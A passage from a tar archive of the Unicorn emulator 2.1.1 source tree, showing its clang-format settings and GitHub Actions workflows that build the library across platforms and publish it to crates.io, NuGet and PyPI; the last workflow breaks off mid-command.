pax_global_header00006660000000000000000000000064146752410670014526gustar00rootroot0000000000000052 comment=d568885d64c89db5b9a722f0c1bef05aa92f84ca unicorn-2.1.1/000077500000000000000000000000001467524106700132045ustar00rootroot00000000000000unicorn-2.1.1/.clang-format000066400000000000000000000007141467524106700155610ustar00rootroot00000000000000BasedOnStyle: LLVM IndentWidth: 4 UseTab: Never BreakBeforeBraces: Linux AllowShortIfStatementsOnASingleLine: Never AllowShortCaseLabelsOnASingleLine: false AllowShortBlocksOnASingleLine: Empty AllowShortFunctionsOnASingleLine: Empty AllowShortLoopsOnASingleLine: false IndentCaseLabels: false ColumnLimit: 80 SortIncludes: false AllowShortLambdasOnASingleLine: Inline AlwaysBreakBeforeMultilineStrings: false BreakStringLiterals: true PointerAlignment: Right unicorn-2.1.1/.github/000077500000000000000000000000001467524106700145445ustar00rootroot00000000000000unicorn-2.1.1/.github/workflows/000077500000000000000000000000001467524106700166015ustar00rootroot00000000000000unicorn-2.1.1/.github/workflows/Crate-publishing.yml000066400000000000000000000036111467524106700225250ustar00rootroot00000000000000name: Crate 📦 Distribution on: push: paths-ignore: - ".gitignore" - "docs/**" - "README" - "CREDITS.TXT" - "COPYING_GLIB" - "COPYING.LGPL2" - "AUTHORS.TXT" - "CHANGELOG" - "COPYING" pull_request: env: UNICORN_VERSION: dev jobs: build: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} strategy: fail-fast: false matrix: config: - { os: windows-2019, arch: x64, name: 'Windows x86_64' } - { os: windows-2019, arch: x86, name: 'Windows x86' } - { os: ubuntu-latest, arch: x64, name: 'Ubuntu x86_64' } - { os: macos-latest, arch: x64, name: 'macOS x86_64' } steps: - uses: actions/checkout@v4 - name: '🛠️ Set up Rust' uses: dtolnay/rust-toolchain@stable - name: '🛠️ Activate Developer Command Prompt' if: contains(matrix.config.os, 'win') uses: ilammy/msvc-dev-cmd@v1 with: arch: ${{ matrix.config.arch }} - name: '🛠️ Win build dependencies' if: contains(matrix.config.os, 'win') shell: bash run: | choco install ninja cmake - name: '🛠️ macOS build dependencies' if: contains(matrix.config.os, 'macOS') shell: bash run: | brew install ninja - name: '🚧 Cargo test' if: "!startsWith(github.ref, 'refs/tags')" run: | cargo test - name: '📦 Cargo Publish' if: startsWith(github.ref, 'refs/tags') && contains(matrix.config.os, 'ubuntu') env: TOKEN: ${{ secrets.cratesio_token }} UNICORN_VERSION: dev run: | cargo login $TOKEN && cargo test && cargo publishunicorn-2.1.1/.github/workflows/Nuget-publishing.yml000066400000000000000000000355751467524106700225670ustar00rootroot00000000000000name: Nuget 📦 Distribution on: push: paths-ignore: - ".gitignore" - "docs/**" - "README" - "CREDITS.TXT" - "COPYING_GLIB" - "COPYING.LGPL2" - "AUTHORS.TXT" - "CHANGELOG" - "COPYING" branches: - dev - master permissions: packages: write jobs: Windows: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} strategy: fail-fast: true matrix: config: - { os: windows-2019, arch: x64, python-arch: x64, python-ver: '3.8', name: 'windows-x64 MSVC 64bit shared', msvc-arch: x64, artifact: 'windows_msvc64_shared.7z', shared: 'yes', build_type: 'Release', archiver: '7z a', generators: 'Visual Studio 16 2019' } - { os: windows-2019, arch: x86, python-arch: x86, python-ver: '3.8', name: 'windows-x86 MSVC 32bit shared', msvc-arch: x86, artifact: 'windows_msvc32_shared.7z', shared: 'yes', build_type: 'Release', archiver: '7z a', generators: 'Visual Studio 16 2019' } compiler: [ gcc ] steps: - uses: actions/checkout@v4 - name: '🛠️ Win MSVC 64 setup' if: contains(matrix.config.name, 'MSVC 64') uses: microsoft/setup-msbuild@v2 - name: '🛠️ Win MSVC 64 dev cmd setup' if: contains(matrix.config.name, 'MSVC 64') uses: ilammy/msvc-dev-cmd@v1 with: arch: x64 - name: '🚧 Win MSVC 64 build' if: contains(matrix.config.name, 'MSVC 64') shell: bash run: | choco install ninja cmake ninja --version cmake --version mkdir build cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_C_FLAGS="//MT" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip --config ${{ matrix.config.build_type }} ctest -VV -C ${{ matrix.config.build_type }} mv Release instdir - name: '🛠️ Win MSVC 32 setup' if: contains(matrix.config.name, 'MSVC 32') uses: ilammy/msvc-dev-cmd@v1 with: arch: x86 - name: '🚧 Win MSVC 32 build' if: contains(matrix.config.name, 'MSVC 32') shell: bash run: | choco install ninja cmake ninja --version cmake --version mkdir build cmake \ -S . \ -B . \ -A "win32" \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_C_FLAGS="//MT" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip --config ${{ matrix.config.build_type }} ctest -VV -C ${{ matrix.config.build_type }} mv Release instdir - name: '📦 Pack artifact' if: always() shell: bash working-directory: instdir run: | ls -laR ${{ matrix.config.archiver }} ../${{ matrix.config.artifact }} . ../test* - name: '📤 Upload artifact' if: always() uses: actions/upload-artifact@v4 with: path: ./${{ matrix.config.artifact }} name: ${{ matrix.config.artifact }} Macos: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} - ${{ matrix.compiler }} strategy: fail-fast: true matrix: config: - { os: macos-latest, arch: x64, python-arch: x64, python-ver: '3.8', name: 'macos-x64 cmake shared', shared: 'yes', artifact: 'macos-cmake-shared-x64.7z', build_type: 'Release', archiver: '7za a', generators: 'Ninja' } compiler: [ gcc ] steps: - uses: actions/checkout@v4 - name: '🚧 Mac build' if: contains(matrix.config.name, 'macos-x64') shell: bash run: | brew install ninja ninja --version cmake --version mkdir build mkdir instdir cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip ctest -VV -C ${{ matrix.config.build_type }} - name: '📦 Pack artifact' if: always() shell: bash working-directory: instdir run: | ls -laR ${{ matrix.config.archiver }} ../${{ matrix.config.artifact }} . ../test* - name: '📤 Upload artifact' if: always() uses: actions/upload-artifact@v4 with: path: ./${{ matrix.config.artifact }} name: ${{ matrix.config.artifact }} Linux: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} - ${{ matrix.compiler }} strategy: fail-fast: false matrix: config: - { os: ubuntu-latest, arch: x64, python-arch: x64, python-ver: '3.8', name: 'ubuntu-x64 cmake shared', shared: 'yes', artifact: 'ubuntu-cmake-shared-x64.7z', build_type: 'Release', archiver: '7z a', generators: 'Ninja' } - { os: ubuntu-latest, arch: x86, python-arch: x86, python-ver: '3.8', name: 'ubuntu-x86 cmake shared', shared: 'yes', artifact: 'ubuntu-cmake-shared-x86.7z', build_type: 'Release', archiver: '7z a', generators: 'Ninja' } - { os: ubuntu-latest, arch: aarch64, python-arch: aarch64, python-ver: '3.8', name: 'ubuntu-aarch64 cmake', artifact: 'ubuntu-cmake-aarch64.7z', build_type: 'Release', archiver: '7z a', generators: 'Ninja', distro: ubuntu20.04 } - { os: ubuntu-latest, arch: ppc64le, python-arch: ppc, python-ver: '3.8', name: 'ubuntu-ppc64le cmake', artifact: 'ubuntu-cmake-ppc64le.7z', build_type: 'Release', archiver: '7z a', generators: 'Ninja', distro: ubuntu20.04 } compiler: [ gcc ] steps: - uses: actions/checkout@v4 - name: '🚧 Linux x64/x86 build' if: contains(matrix.config.arch, 'x64') || contains(matrix.config.arch, 'x86') shell: 'script -q -e -c "bash {0}"' run: | if [ ${{ matrix.config.arch }} == 'x64' ]; then sudo apt install -q -y libcmocka-dev ninja-build else export CFLAGS="-m32" LDFLAGS="-m32" LDFLAGS_STATIC="-m32" UNICORN_QEMU_FLAGS="--cpu=i386" sudo dpkg --add-architecture i386 sudo apt update sudo apt install -q -y lib32ncurses-dev lib32z1-dev lib32gcc-9-dev libc6-dev-i386 gcc-multilib \ libcmocka-dev:i386 libcmocka0:i386 libc6:i386 libgcc-s1:i386 ninja-build fi mkdir build mkdir instdir cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip ctest -VV -C ${{ matrix.config.build_type }} - name: '🚧 Linux ppc64le/aarch64 build' if: contains(matrix.config.arch, 'ppc64le') || contains(matrix.config.arch, 'aarch64') uses: uraimo/run-on-arch-action@v2 with: arch: ${{ matrix.config.arch }} distro: ${{ matrix.config.distro }} setup: | mkdir -p "${PWD}/instdir" dockerRunArgs: | --volume "${PWD}/instdir:/instdir" shell: /bin/sh install: | apt-get update -q -y apt-get install -q -y git cmake build-essential automake libcmocka-dev pkg-config ${{ matrix.compiler }} ninja-build run: | mkdir build cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=/instdir cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip ctest -VV -C ${{ matrix.config.build_type }} - name: '📦 Pack artifact' if: always() shell: bash working-directory: instdir run: | ls -laR ${{ matrix.config.archiver }} ../${{ matrix.config.artifact }} . ../test* - name: '📤 Upload artifact' if: always() uses: actions/upload-artifact@v4 with: path: ./${{ matrix.config.artifact }} name: ${{ matrix.config.artifact }} publish: needs: ["Windows", "Macos", "Linux"] if: ${{ needs.Windows.result == 'success' && needs.Macos.result == 'success' && needs.Linux.result == 'success' }} runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - name: 🛠️ Download artifacts uses: actions/download-artifact@v4 with: path: artifacts - name: 🛠️ Extract artifacts shell: python run: | import subprocess import os artifactPath = os.path.join(os.getcwd(), "artifacts") bindingsPath = os.path.join(os.getcwd(), "bindings", "dotnet", "UnicornEngine") ARTIFACT_CONFIG = { "ubuntu-cmake-aarch64.7z": { "sourceDir": "lib/", "sourceFile": "libunicorn.so.*", "destDir": "runtimes/linux-arm64/native", "destFile": "libunicorn.so" }, "ubuntu-cmake-ppc64le.7z": { "sourceDir": "lib/", "sourceFile": "libunicorn.so.*", "destDir": "runtimes/linux-ppc64le/native", "destFile": "libunicorn.so" }, "ubuntu-cmake-shared-x86.7z": { "sourceDir": "lib/", "sourceFile": "libunicorn.so.*", "destDir": "runtimes/linux-x64/native", "destFile": "libunicorn.so" }, "macos-cmake-shared-x64.7z": { "sourceDir": "lib/", "sourceFile": "libunicorn.*.dylib", "destDir": "runtimes/osx-x64/native", "destFile": "libunicorn.dylib" }, "windows_msvc64_shared.7z": { "sourceDir": "", "sourceFile": "unicorn.dll", "destDir": "runtimes/win-x64/native", "destFile": "unicorn.dll" }, "windows_msvc32_shared.7z": { "sourceDir": "", "sourceFile": "unicorn.dll", "destDir": "runtimes/win-x86/native", "destFile": "unicorn.dll" } } if len(os.listdir(artifactPath)) < len(ARTIFACT_CONFIG.keys()): print("Some artifacts are missing. Aborting.") exit(1) for artifact in os.listdir(artifactPath): if artifact in ARTIFACT_CONFIG.keys(): print("Working on:", artifact) config = ARTIFACT_CONFIG[artifact] destDir = os.path.join(bindingsPath, config["destDir"]) print("Creating dir:", destDir) os.makedirs(destDir, exist_ok=True) print(f"Extracting library from 7z file to: {config['destDir']}/{config['sourceFile']}") result = subprocess.run(["7z", "e", f"-o{destDir}/", os.path.join(artifactPath, artifact), f"{config['sourceDir']}{config['sourceFile']}"]) result.check_returncode() if config["sourceFile"] != config["destFile"]: output = subprocess.run(["ls", destDir], stdout=subprocess.PIPE) sourceFile = output.stdout.decode().strip() print(f"Renaming {sourceFile} to {config['destFile']}") os.rename(os.path.join(destDir, sourceFile), os.path.join(destDir, config["destFile"])) print("Done!") - name: 🛠️ Get short sha id: git_short_sha run: echo "result=$(git rev-parse --short "${{ github.sha }}")" >> $GITHUB_OUTPUT - uses: actions/setup-dotnet@v4 with: dotnet-version: 6.0.x - name: 🛠️ Authenticate to Github Packages working-directory: bindings/dotnet/UnicornEngine run: dotnet nuget add source --username "${{ github.repository_owner }}" --password "${{ secrets.GITHUB_TOKEN }}" --store-password-in-clear-text --name github "https://nuget.pkg.github.com/${{ github.repository_owner }}/index.json" - name: 🛠️ List all native libraries working-directory: bindings/dotnet/UnicornEngine run: find ./runtimes -type f -print - name: 🚧 Package .NET distribution working-directory: bindings/dotnet/UnicornEngine run: | [[ "${{ github.ref_name }}" == "master" ]] \ && dotnet pack -c Release \ || dotnet pack -c Release --version-suffix="${{ steps.git_short_sha.outputs.result }}" - name: '📤 Upload artifact' uses: actions/upload-artifact@v4 with: path: ${{ github.workspace }}/bindings/dotnet/UnicornEngine/bin/Release/UnicornEngine.Unicorn.*.nupkg - name: 📦 Publish to Github Packages if: startsWith(github.ref, 'refs/tags') working-directory: bindings/dotnet/UnicornEngine run: dotnet nuget push "bin/Release/UnicornEngine.Unicorn.*.nupkg" --source "github" --api-key "${{ secrets.GHPR_TOKEN }}" - name: 📦 Publish Nuget package if: startsWith(github.ref, 'refs/tags') working-directory: bindings/dotnet/UnicornEngine run: dotnet nuget push "bin/Release/UnicornEngine.Unicorn.*.nupkg" -k "$NUGET_AUTH_TOKEN" -s https://api.nuget.org/v3/index.json env: NUGET_AUTH_TOKEN: ${{ secrets.NUGET_KEY }} unicorn-2.1.1/.github/workflows/PyPI-publishing.yml000066400000000000000000000117741467524106700223210ustar00rootroot00000000000000name: PyPI 📦 Distribution on: push: paths-ignore: - ".gitignore" - "docs/**" - "README" - "CREDITS.TXT" - "COPYING_GLIB" - "COPYING.LGPL2" - "AUTHORS.TXT" - "CHANGELOG" - "COPYING" pull_request: jobs: build: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} strategy: fail-fast: false matrix: config: - { os: windows-2019, arch: x64, python-ver: '3.8', name: 'win_amd64' } - { os: windows-2019, arch: x32, python-ver: '3.8', name: 'win32' } - { os: ubuntu-latest, arch: x64, python-ver: '3.8', name: 'musllinux' } - { os: ubuntu-latest, arch: x64, python-ver: '3.8', name: 'manylinux2014_x86_64' } - { os: ubuntu-latest, arch: x32, python-ver: '3.8', name: 'manylinux2014_i686' } - { os: ubuntu-latest, arch: aarch64, python-ver: '3.8', name: 'manylinux2014_aarch64' } - { os: ubuntu-latest, arch: x64, python-ver: '3.8', name: 'sdist' } - { os: macos-12, arch: x86_64, python-ver: '3.8', name: 'macos_x86_64' } - { os: macos-14, arch: arm64, python-ver: '3.10', name: 'macos_arm64' } steps: - uses: actions/checkout@v4 - name: '🛠️ Set up Python' uses: actions/setup-python@v5 with: python-version: ${{ matrix.config.python-ver }} - name: '🛠️ Add msbuild to PATH' if: contains(matrix.config.name, 'win') uses: microsoft/setup-msbuild@v2 with: vs-version: '16.5' - name: '🛠️ Win MSVC 32 dev cmd setup' if: contains(matrix.config.name, 'win32') uses: ilammy/msvc-dev-cmd@v1 with: arch: x86 - name: '🛠️ Win MSVC 64 dev cmd setup' if: contains(matrix.config.name, 'win_amd64') uses: ilammy/msvc-dev-cmd@v1 with: arch: x64 - name: '🛠️ Win build dependencies' if: contains(matrix.config.name, 'win') shell: bash run: | choco install ninja cmake - name: '🛠️ macOS dependencies' if: contains(matrix.config.name, 'macos') run: | brew install ninja - name: '🛠️ pip dependencies' run: | pip install --upgrade setuptools wheel - name: '🚧 Build distribution' shell: bash run: | if [ ${{ matrix.config.name }} == 'win32' ]; then cd bindings/python && python setup.py build -p win32 sdist bdist_wheel -p win32 rm dist/*.tar.gz elif [ ${{ matrix.config.name }} == 'manylinux2014_i686' ]; then docker run --rm -v `pwd`/:/work dockcross/manylinux2014-x86 > ./dockcross chmod +x ./dockcross ./dockcross bindings/python/build_wheel.sh elif [ ${{ matrix.config.name }} == 'manylinux2014_aarch64' ]; then docker run --rm -v `pwd`/:/work dockcross/manylinux2014-aarch64 > ./dockcross chmod +x ./dockcross ./dockcross bindings/python/build_wheel.sh --plat-name manylinux2014_aarch64 elif [ ${{ matrix.config.name }} == 'manylinux2014_x86_64' ]; then docker run --rm -v `pwd`/:/work dockcross/manylinux2014-x64 > ./dockcross chmod +x ./dockcross ./dockcross bindings/python/build_wheel.sh elif [ ${{ matrix.config.name }} == 'musllinux' ]; then docker run --rm -v `pwd`:/work -w /work python:3.7-alpine sh /work/bindings/python/musl_wheel.sh elif [ ${{ matrix.config.name }} == 'sdist' ]; then cd bindings/python && python setup.py sdist elif [ ${{ matrix.config.name }} == 'macos_arm64' ]; then cd bindings/python && _PYTHON_HOST_PLATFORM="macosx-11.0-arm64" ARCHFLAGS="-arch arm64" python setup.py bdist_wheel else cd bindings/python && python setup.py bdist_wheel fi - name: '📤 Upload artifact' uses: actions/upload-artifact@v4 with: name: ${{ matrix.config.name }} path: ${{ github.workspace }}/bindings/python/dist/* publish: needs: [build] runs-on: ubuntu-latest if: startsWith(github.ref, 'refs/tags') steps: - uses: actions/download-artifact@v4 with: merge-multiple: true path: dist - name: '📦 Publish distribution to PyPI' uses: pypa/gh-action-pypi-publish@release/v1 with: user: __token__ password: ${{ secrets.pypi_pass }} unicorn-2.1.1/.github/workflows/build-uc2.yml000066400000000000000000000445471467524106700211300ustar00rootroot00000000000000name: Build UC2 on: push: paths-ignore: - ".gitignore" - "docs/**" - "README" - "CREDITS.TXT" - "COPYING_GLIB" - "COPYING.LGPL2" - "AUTHORS.TXT" - "CHANGELOG" - "COPYING" pull_request: env: CI: true jobs: Windows: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} strategy: fail-fast: false matrix: config: - { os: windows-2019, arch: x64, python-arch: x64, python-ver: '3.8', name: 'windows-x64 MINGW64 shared', shared: 'yes', mingw: MINGW64, mingw-arch: x86_64, artifact: 'windows_mingw64-shared.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja' } - { os: windows-2019, arch: x64, python-arch: x64, python-ver: '3.8', name: 'windows-x64 MINGW64 static', shared: 'no', mingw: MINGW64, mingw-arch: x86_64, artifact: 'windows_mingw64-static.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja' } # - { # This fails randomly which can't be reproduced. # os: windows-2019, # arch: x64, # python-arch: x64, # python-ver: '3.8', # name: 'windows-x64 MINGW32 shared', # shared: "yes", # mingw: MINGW32, # mingw-arch: i686, # artifact: 'windows_mingw32.7z', # build_type: 'Debug', # archiver: '7z a', # generators: 'Ninja' # } # - { # This fails randomly which can't be reproduced. # os: windows-2019, # arch: x64, # python-arch: x64, # python-ver: '3.8', # name: 'windows-x64 MINGW32 static', # shared: "no", # mingw: MINGW32, # mingw-arch: i686, # artifact: 'windows_mingw32.7z', # build_type: 'Debug', # archiver: '7z a', # generators: 'Ninja' # } - { os: windows-2019, arch: x64, python-arch: x64, python-ver: '3.8', name: 'windows-x64 MSVC 64bit shared', msvc-arch: x64, artifact: 'windows_msvc64_shared.7z', shared: 'yes', build_type: 'Debug', archiver: '7z a', generators: 'Visual Studio 16 2019' } - { os: windows-2019, arch: x86, python-arch: x86, python-ver: '3.8', name: 'windows-x86 MSVC 32bit shared', msvc-arch: x86, artifact: 'windows_msvc32_shared.7z', shared: 'yes', build_type: 'Debug', archiver: '7z a', generators: 'Visual Studio 16 2019' } - { os: windows-2019, arch: x64, python-arch: x64, python-ver: '3.8', name: 'windows-x64 MSVC 64bit static', msvc-arch: x64, artifact: 'windows_msvc64_static.7z', shared: 'no', build_type: 'Debug', archiver: '7z a', generators: 'Visual Studio 16 2019' } - { os: windows-2019, arch: x86, python-arch: x86, python-ver: '3.8', name: 'windows-x86 MSVC 32bit static', msvc-arch: x86, artifact: 'windows_msvc32_static.7z', shared: 'no', build_type: 'Debug', archiver: '7z a', generators: 'Visual Studio 16 2019' } compiler: [ gcc ] steps: - uses: actions/checkout@v4 - name: '🛠️ Win MINGW setup' if: contains(matrix.config.mingw, 'MINGW') uses: msys2/setup-msys2@v2 with: msystem: ${{ matrix.config.mingw }} install: >- git mingw-w64-${{ matrix.config.mingw-arch }}-cmake mingw-w64-${{ matrix.config.mingw-arch }}-ninja mingw-w64-${{ matrix.config.mingw-arch }}-cmocka mingw-w64-${{ matrix.config.mingw-arch }}-${{ matrix.compiler }} mingw-w64-${{ matrix.config.mingw-arch }}-toolchain - name: '🛠️ Win MSVC 64 setup' if: contains(matrix.config.name, 'MSVC 64') uses: microsoft/setup-msbuild@v2 - name: '🛠️ Win MSVC 64 dev cmd setup' if: contains(matrix.config.name, 'MSVC 64') uses: ilammy/msvc-dev-cmd@v1 with: arch: x64 - name: '🚧 Win MSVC 64 build' if: contains(matrix.config.name, 'MSVC 64') shell: bash run: | choco install ninja cmake ninja --version cmake --version mkdir build cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip --config ${{ matrix.config.build_type }} ctest -VV -C ${{ matrix.config.build_type }} mv Debug instdir - name: '🛠️ Win MSVC 32 setup' if: contains(matrix.config.name, 'MSVC 32') uses: ilammy/msvc-dev-cmd@v1 with: arch: x86 - name: '🚧 Win MSVC 32 build' if: contains(matrix.config.name, 'MSVC 32') shell: bash run: | choco install ninja cmake ninja --version cmake --version mkdir build cmake \ -S . \ -B . \ -A "win32" \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip --config ${{ matrix.config.build_type }} ctest -VV -C ${{ matrix.config.build_type }} mv Debug instdir - name: '🚧 Win MINGW build' if: contains(matrix.config.mingw, 'MINGW') shell: msys2 {0} run: | if [ ${{ matrix.config.mingw }} == 'MINGW32' ]; then export CPPFLAGS=-D__USE_MINGW_ANSI_STDIO=1 #export CC=i686-w64-mingw32-gcc export AR=gcc-ar export RANLIB=gcc-ranlib export CFLAGS="-m32 -static" export LDFLAGS="-m32" export LDFLAGS_STATIC="-m32" export UNICORN_QEMU_FLAGS="--cpu=i386" fi mkdir build mkdir instdir cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DCMAKE_C_FLAGS:STRING="-static" \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip ctest -VV -C ${{ matrix.config.build_type }} - name: '📦 Pack artifact' if: always() shell: bash working-directory: instdir run: | ls -laR ${{ matrix.config.archiver }} ../${{ matrix.config.artifact }} . ../test* - name: '📤 Upload artifact' if: always() uses: actions/upload-artifact@v4 with: path: ./${{ matrix.config.artifact }} name: ${{ matrix.config.artifact }} Macos: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} - ${{ matrix.compiler }} strategy: fail-fast: false matrix: config: - { os: macos-12, # x64 arch: x64, python-arch: x64, python-ver: '3.8', name: 'macos-x64 cmake shared', shared: 'yes', artifact: 'macos-x64-cmake-shared-x64.7z', build_type: 'Debug', archiver: '7za a', generators: 'Ninja' } - { os: macos-12, arch: x64, python-arch: x64, python-ver: '3.8', name: 'macos-x64 cmake static', shared: 'no', artifact: 'macos-x64-cmake-static-x64.7z', build_type: 'Debug', archiver: '7za a', generators: 'Ninja' } - { os: macos-14, # arm64 arch: arm64, python-arch: arm64, python-ver: '3.8', name: 'macos-arm64 cmake shared', shared: 'yes', artifact: 'macos-arm64-cmake-shared-x64.7z', build_type: 'Debug', archiver: '7za a', generators: 'Ninja' } - { os: macos-14, arch: arm64, python-arch: arm64, python-ver: '3.8', name: 'macos-arm64 cmake static', shared: 'no', artifact: 'macos-arm64-cmake-static-x64.7z', build_type: 'Debug', archiver: '7za a', generators: 'Ninja' } - { os: macos-12, arch: x86_64, python-arch: x86_64, python-ver: '3.8', name: 'android cmake', artifact: 'Android-x86_64.7z', build_type: 'Debug', archiver: '7za a', generators: 'Ninja' } compiler: [ gcc ] steps: - uses: actions/checkout@v4 # - name: '🛠️ Python setup' # uses: actions/setup-python@v5 # with: # python-version: ${{ matrix.config.python-ver }} - name: '🚧 Mac build' if: contains(matrix.config.name, 'macos') shell: bash run: | brew install ninja ninja --version cmake --version mkdir build mkdir instdir cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip ctest -VV -C ${{ matrix.config.build_type }} # - name: Setup tmate session # if: ${{ failure() }} # uses: mxschmitt/action-tmate@v3 - name: '🚧 Android x86_64 build' if: contains(matrix.config.name, 'android') shell: bash run: | brew install ninja mkdir build mkdir instdir cmake . -DCMAKE_TOOLCHAIN_FILE="$ANDROID_NDK/build/cmake/android.toolchain.cmake" \ -DANDROID_PLATFORM=android-28 \ -DANDROID_NDK="$ANDROID_NDK" \ -DANDROID_ABI=${{ matrix.config.arch }} \ -DOLP_SDK_ENABLE_TESTING=NO \ -DOLP_SDK_BUILD_EXAMPLES=ON \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip - name: '🚧 AVD Cache' if: contains(matrix.config.name, 'android') uses: actions/cache@v4 id: avd-cache with: path: | ~/.android/avd/* ~/.android/adb* key: avd-28 - name: '🚧 Create x86_64 tests environment' if: contains(matrix.config.name, 'android') && steps.avd-cache.outputs.cache-hit != 'true' uses: reactivecircus/android-emulator-runner@v2 with: api-level: 28 arch: ${{ matrix.config.arch }} force-avd-creation: false disable-animations: false target: default profile: Nexus 6 emulator-options: -no-window -gpu swiftshader_indirect -no-snapshot -noaudio -no-boot-anim -verbose -show-kernel script: echo "Generated AVD snapshot for caching." - name: '🚧 Android x86_64 tests' if: contains(matrix.config.name, 'android') uses: reactivecircus/android-emulator-runner@v2 with: api-level: 28 force-avd-creation: false disable-animations: true arch: ${{ matrix.config.arch }} target: default profile: Nexus 6 emulator-options: -no-window -gpu swiftshader_indirect -no-snapshot -noaudio -no-boot-anim -verbose -show-kernel script: bash ./adb.sh - name: '📦 Pack artifact' if: always() shell: bash working-directory: instdir run: | ls -laR ${{ matrix.config.archiver }} ../${{ matrix.config.artifact }} . ../test* - name: '📤 Upload artifact' if: always() uses: actions/upload-artifact@v4 with: path: ./${{ matrix.config.artifact }} name: ${{ matrix.config.artifact }} Linux: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} - ${{ matrix.compiler }} strategy: fail-fast: false matrix: config: - { os: ubuntu-latest, arch: x64, python-arch: x64, python-ver: '3.8', name: 'ubuntu-x64 cmake shared', shared: 'yes', artifact: 'ubuntu-cmake-shared-x64.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja' } - { os: ubuntu-latest, arch: x86, python-arch: x86, python-ver: '3.8', name: 'ubuntu-x86 cmake shared', shared: 'yes', artifact: 'ubuntu-cmake-shared-x86.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja' } - { os: ubuntu-latest, arch: x64, python-arch: x64, python-ver: '3.8', name: 'ubuntu-x64 cmake static', shared: 'no', artifact: 'ubuntu-cmake-static-x64.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja' } - { os: ubuntu-latest, arch: x86, python-arch: x86, python-ver: '3.8', name: 'ubuntu-x86 cmake static', shared: 'no', artifact: 'ubuntu-cmake-static-x86.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja' } - { os: ubuntu-latest, arch: aarch64, python-arch: aarch64, python-ver: '3.8', name: 'ubuntu-aarch64 cmake', artifact: 'ubuntu-cmake-aarch64.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja', distro: ubuntu20.04 } - { os: ubuntu-latest, arch: ppc64le, python-arch: ppc, python-ver: '3.8', name: 'ubuntu-ppc64le cmake', artifact: 'ubuntu-cmake-ppc64le.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja', distro: ubuntu20.04 } compiler: [ gcc ] steps: - uses: actions/checkout@v4 # - name: '🛠️ Python setup' # uses: actions/setup-python@v5 # with: # python-version: ${{ matrix.config.python-ver }} - name: '🚧 Linux x64/x86 build' if: contains(matrix.config.arch, 'x64') || contains(matrix.config.arch, 'x86') shell: 'script -q -e -c "bash {0}"' run: | if [ ${{ matrix.config.arch }} == 'x64' ]; then sudo apt install -q -y libcmocka-dev ninja-build else export CFLAGS="-m32" LDFLAGS="-m32" LDFLAGS_STATIC="-m32" UNICORN_QEMU_FLAGS="--cpu=i386" sudo dpkg --add-architecture i386 sudo apt install -q -y lib32ncurses-dev lib32z1-dev lib32gcc-9-dev libc6-dev-i386 gcc-multilib \ libcmocka-dev:i386 libcmocka0:i386 libc6:i386 libgcc-s1:i386 ninja-build fi mkdir build mkdir instdir cmake \ 